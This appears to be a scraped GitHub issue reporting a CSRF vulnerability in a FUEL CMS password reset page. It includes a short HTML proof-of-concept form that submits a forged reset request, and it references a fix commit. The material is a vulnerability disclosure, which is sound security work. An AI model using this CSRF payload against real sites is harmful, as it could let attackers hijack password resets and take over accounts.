We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? # to your account
Because my mailbox function is not configured, it cannot be fully demonstrated. There is a CSRF vulnerability in the password modification page.
http://website/fuel/index.php/fuel/#/pwd_reset
csrf POC:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.255.130/fuel/index.php/fuel/#/pwd_reset" method="POST"> <input type="hidden" name="email" value="1231@1.com" /> <input type="hidden" name="Submit" value="Submit" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
fix: for issue #584
6164cd7
大师傅拿下cve了吗
Sorry, something went wrong.
No branches or pull requests
Because my mailbox function is not configured, it cannot be fully demonstrated. There is a CSRF vulnerability in the password modification page.
http://website/fuel/index.php/fuel/#/pwd_reset
data:image/s3,"s3://crabby-images/3f38b/3f38b3dad8f58ed1cb70fc0ae5e85f10a5f9586a" alt="image"
csrf POC:
The text was updated successfully, but these errors were encountered: